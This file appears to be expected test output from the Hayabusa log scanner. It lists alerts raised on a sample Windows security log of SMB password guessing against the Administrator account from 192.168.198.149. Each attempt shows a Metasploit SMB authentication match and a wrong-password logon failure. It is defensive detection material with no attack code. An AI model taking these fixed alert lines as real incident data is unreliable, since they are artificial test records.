+2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ohqvCoOLkFRcqvE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: me8rikVJqcKxvHdq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oLqVmqCmHTrD7V8V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ySdyzxvDasHgjq0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N2auwOc1wemq76n1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RgK6lHgC5WOBk4kW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2GG0bKgusKqseQij  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MpHm7DcOmhq4rkaX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OX1vVGrE7fJSMEiZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 65i7wtyAhL58QrzC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k8uSVFRTLTB6g1eg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ire6VOUMWZQnNjES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pGWnvKUXnbJvRqql  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xBVvrrLf1rnAviKS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NE9atGNBlSLQLLcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a0M5EaAXziu07hOH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PM1mwxqI7yVgoK2D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MPqnpvetHXdThxYg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gthbVQMJ7UD2QS7H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AwwJXCoC3gMDoDn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ilNNoVbZpyhtsNkV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eNY0lv9IglfHP34d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BjSeQciwy17L7raV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wycE1fIsmPq9zaMU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5z1spxImm2ZlGOld  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dg7o4GCET1bJrlEU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E7Db3OLA0XPXL1B4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Uoqx5iPRp2tfYYos  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ixw5XWC2frtrTUkv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3v0NpzAp7io9gbZQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AfOOiR2zO5xem9Tk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yiGtitRqZbGNKrtN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7oQ70LvSMnGxBCFO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGHr8623vHZyMY5B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: X5Y1C9A4XqxQGoVA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SOnirLGOZzRVSt3y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jLu7XtYCHPqVNE7u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w242Ei1CpWErEE4m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UOZUagVG4R6zcK92  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7hQOl8XV3Ydp8UcW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1XBRDfoN0I2iu6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ngyknhk7uGvs38bG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QXZUhLVsfRUBDcsu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VEDAtkhiSqUcLj2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M4CmH02M91kHzeK2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
